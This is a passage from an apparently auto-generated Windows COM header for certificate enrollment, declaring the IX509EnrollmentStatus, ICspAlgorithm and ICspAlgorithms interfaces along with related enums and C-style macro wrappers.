    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX500DistinguishedName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX500DistinguishedName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX500DistinguishedName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX500DistinguishedName_Decode(This,strEncodedName,Encoding,NameFlags)	\
    ( (This)->lpVtbl -> Decode(This,strEncodedName,Encoding,NameFlags) ) 

#define IX500DistinguishedName_Encode(This,strName,NameFlags)	\
    ( (This)->lpVtbl -> Encode(This,strName,NameFlags) ) 

#define IX500DistinguishedName_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IX500DistinguishedName_get_EncodedName(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedName(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX500DistinguishedName_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0004 */
/* [local] */ 

typedef 
enum X509CertificateEnrollmentContext
    {	ContextUser	= 0x1,
	ContextMachine	= 0x2,
	ContextAdministratorForceMachine	= 0x3
    } 	X509CertificateEnrollmentContext;

typedef 
enum EnrollmentEnrollStatus
    {	Enrolled	= 0x1,
	EnrollPended	= 0x2,
	EnrollUIDeferredEnrollmentRequired	= 0x4,
	EnrollError	= 0x10,
	EnrollUnknown	= 0x20,
	EnrollSkipped	= 0x40,
	EnrollDenied	= 0x100
    } 	EnrollmentEnrollStatus;

typedef 
enum EnrollmentSelectionStatus
    {	SelectedNo	= 0,
	SelectedYes	= 1
    } 	EnrollmentSelectionStatus;

typedef 
enum EnrollmentDisplayStatus
    {	DisplayNo	= 0,
	DisplayYes	= 1
    } 	EnrollmentDisplayStatus;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0004_v0_0_s_ifspec;

#ifndef __IX509EnrollmentStatus_INTERFACE_DEFINED__
#define __IX509EnrollmentStatus_INTERFACE_DEFINED__

/* interface IX509EnrollmentStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab304-217d-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentStatus : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE AppendText( 
            /* [in] */ __RPC__in BSTR strText) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Text( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Text( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Selected( 
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Selected( 
            /* [in] */ EnrollmentSelectionStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Display( 
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Display( 
            /* [in] */ EnrollmentDisplayStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Status( 
            /* [in] */ EnrollmentEnrollStatus Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Error( 
            /* [retval][out] */ __RPC__out HRESULT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Error( 
            /* [in] */ HRESULT Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ErrorText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentStatus * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *AppendText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR strText);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Text )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentSelectionStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Selected )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentSelectionStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentDisplayStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Display )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentDisplayStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out EnrollmentEnrollStatus *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Status )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ EnrollmentEnrollStatus Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__out HRESULT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Error )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [in] */ HRESULT Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ErrorText )( 
            __RPC__in IX509EnrollmentStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentStatusVtbl;

    interface IX509EnrollmentStatus
    {
        CONST_VTBL struct IX509EnrollmentStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentStatus_AppendText(This,strText)	\
    ( (This)->lpVtbl -> AppendText(This,strText) ) 

#define IX509EnrollmentStatus_get_Text(This,pValue)	\
    ( (This)->lpVtbl -> get_Text(This,pValue) ) 

#define IX509EnrollmentStatus_put_Text(This,Value)	\
    ( (This)->lpVtbl -> put_Text(This,Value) ) 

#define IX509EnrollmentStatus_get_Selected(This,pValue)	\
    ( (This)->lpVtbl -> get_Selected(This,pValue) ) 

#define IX509EnrollmentStatus_put_Selected(This,Value)	\
    ( (This)->lpVtbl -> put_Selected(This,Value) ) 

#define IX509EnrollmentStatus_get_Display(This,pValue)	\
    ( (This)->lpVtbl -> get_Display(This,pValue) ) 

#define IX509EnrollmentStatus_put_Display(This,Value)	\
    ( (This)->lpVtbl -> put_Display(This,Value) ) 

#define IX509EnrollmentStatus_get_Status(This,pValue)	\
    ( (This)->lpVtbl -> get_Status(This,pValue) ) 

#define IX509EnrollmentStatus_put_Status(This,Value)	\
    ( (This)->lpVtbl -> put_Status(This,Value) ) 

#define IX509EnrollmentStatus_get_Error(This,pValue)	\
    ( (This)->lpVtbl -> get_Error(This,pValue) ) 

#define IX509EnrollmentStatus_put_Error(This,Value)	\
    ( (This)->lpVtbl -> put_Error(This,Value) ) 

#define IX509EnrollmentStatus_get_ErrorText(This,pValue)	\
    ( (This)->lpVtbl -> get_ErrorText(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentStatus_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0005 */
/* [local] */ 

typedef 
enum X509ProviderType
    {	XCN_PROV_NONE	= 0,
	XCN_PROV_RSA_FULL	= 1,
	XCN_PROV_RSA_SIG	= 2,
	XCN_PROV_DSS	= 3,
	XCN_PROV_FORTEZZA	= 4,
	XCN_PROV_MS_EXCHANGE	= 5,
	XCN_PROV_SSL	= 6,
	XCN_PROV_RSA_SCHANNEL	= 12,
	XCN_PROV_DSS_DH	= 13,
	XCN_PROV_EC_ECDSA_SIG	= 14,
	XCN_PROV_EC_ECNRA_SIG	= 15,
	XCN_PROV_EC_ECDSA_FULL	= 16,
	XCN_PROV_EC_ECNRA_FULL	= 17,
	XCN_PROV_DH_SCHANNEL	= 18,
	XCN_PROV_SPYRUS_LYNKS	= 20,
	XCN_PROV_RNG	= 21,
	XCN_PROV_INTEL_SEC	= 22,
	XCN_PROV_REPLACE_OWF	= 23,
	XCN_PROV_RSA_AES	= 24
    } 	X509ProviderType;

// XCN_BCRYPT_SIGNATURE_INTERFACE: RSA, DSA, ECDSA_P* signature
// XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE: RSA encryption
// XCN_BCRYPT_CIPHER_INTERFACE: RC2, RC4, DES, 3DES, AES symmetric encryption
// XCN_BCRYPT_HASH_INTERFACE: MD2, MD4, SHA1, SHA256, SHA384, SHA512 MAC, HMAC Hash
// XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE: DH, ECDH_P* key agreement
// XCN_BCRYPT_RNG_INTERFACE: RNG
typedef 
enum AlgorithmType
    {	XCN_BCRYPT_UNKNOWN_INTERFACE	= 0,
	XCN_BCRYPT_SIGNATURE_INTERFACE	= 0x5,
	XCN_BCRYPT_ASYMMETRIC_ENCRYPTION_INTERFACE	= 0x3,
	XCN_BCRYPT_CIPHER_INTERFACE	= 0x1,
	XCN_BCRYPT_HASH_INTERFACE	= 0x2,
	XCN_BCRYPT_SECRET_AGREEMENT_INTERFACE	= 0x4,
	XCN_BCRYPT_RNG_INTERFACE	= 0x6
    } 	AlgorithmType;

typedef 
enum AlgorithmOperationFlags
    {	XCN_NCRYPT_NO_OPERATION	= 0,
	XCN_NCRYPT_CIPHER_OPERATION	= 0x1,
	XCN_NCRYPT_HASH_OPERATION	= 0x2,
	XCN_NCRYPT_ASYMMETRIC_ENCRYPTION_OPERATION	= 0x4,
	XCN_NCRYPT_SECRET_AGREEMENT_OPERATION	= 0x8,
	XCN_NCRYPT_SIGNATURE_OPERATION	= 0x10,
	XCN_NCRYPT_RNG_OPERATION	= 0x20,
	XCN_NCRYPT_ANY_ASYMMETRIC_OPERATION	= ( ( 0x4 | 0x8 )  | 0x10 ) ,
	XCN_NCRYPT_PREFER_SIGNATURE_ONLY_OPERATION	= 0x200000,
	XCN_NCRYPT_PREFER_NON_SIGNATURE_OPERATION	= 0x400000,
	XCN_NCRYPT_EXACT_MATCH_OPERATION	= 0x800000,
	XCN_NCRYPT_PREFERENCE_MASK_OPERATION	= 0xe00000
    } 	AlgorithmOperationFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0005_v0_0_s_ifspec;

#ifndef __ICspAlgorithm_INTERFACE_DEFINED__
#define __ICspAlgorithm_INTERFACE_DEFINED__

/* interface ICspAlgorithm */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithm;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab305-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithm : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetAlgorithmOid( 
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_DefaultLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_IncrementLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_LongName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MaxLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MinLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out AlgorithmType *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Operations( 
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithm * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithm * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithm * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithm * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetAlgorithmOid )( 
            __RPC__in ICspAlgorithm * This,
            /* [in] */ LONG Length,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_IncrementLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_LongName )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MinLength )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmType *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Operations )( 
            __RPC__in ICspAlgorithm * This,
            /* [retval][out] */ __RPC__out AlgorithmOperationFlags *pValue);
        
        END_INTERFACE
    } ICspAlgorithmVtbl;

    interface ICspAlgorithm
    {
        CONST_VTBL struct ICspAlgorithmVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithm_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithm_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithm_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithm_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspAlgorithm_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithm_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithm_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspAlgorithm_GetAlgorithmOid(This,Length,AlgFlags,ppValue)	\
    ( (This)->lpVtbl -> GetAlgorithmOid(This,Length,AlgFlags,ppValue) ) 

#define ICspAlgorithm_get_DefaultLength(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultLength(This,pValue) ) 

#define ICspAlgorithm_get_IncrementLength(This,pValue)	\
    ( (This)->lpVtbl -> get_IncrementLength(This,pValue) ) 

#define ICspAlgorithm_get_LongName(This,pValue)	\
    ( (This)->lpVtbl -> get_LongName(This,pValue) ) 

#define ICspAlgorithm_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspAlgorithm_get_MaxLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxLength(This,pValue) ) 

#define ICspAlgorithm_get_MinLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MinLength(This,pValue) ) 

#define ICspAlgorithm_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspAlgorithm_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspAlgorithm_get_Operations(This,pValue)	\
    ( (This)->lpVtbl -> get_Operations(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithm_INTERFACE_DEFINED__ */


#ifndef __ICspAlgorithms_INTERFACE_DEFINED__
#define __ICspAlgorithms_INTERFACE_DEFINED__

/* interface ICspAlgorithms */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspAlgorithms;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab306-217d-11da-b2a4-000e7bbb2b09")
    ICspAlgorithms : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICspAlgorithmsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspAlgorithms * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspAlgorithms * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspAlgorithms * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspAlgorithms * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspAlgorithms * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspAlgorithms * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICspAlgorithms * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        END_INTERFACE
    } ICspAlgorithmsVtbl;

    interface ICspAlgorithms
    {
        CONST_VTBL struct ICspAlgorithmsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspAlgorithms_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspAlgorithms_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspAlgorithms_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspAlgorithms_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspAlgorithms_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithms_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithms_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


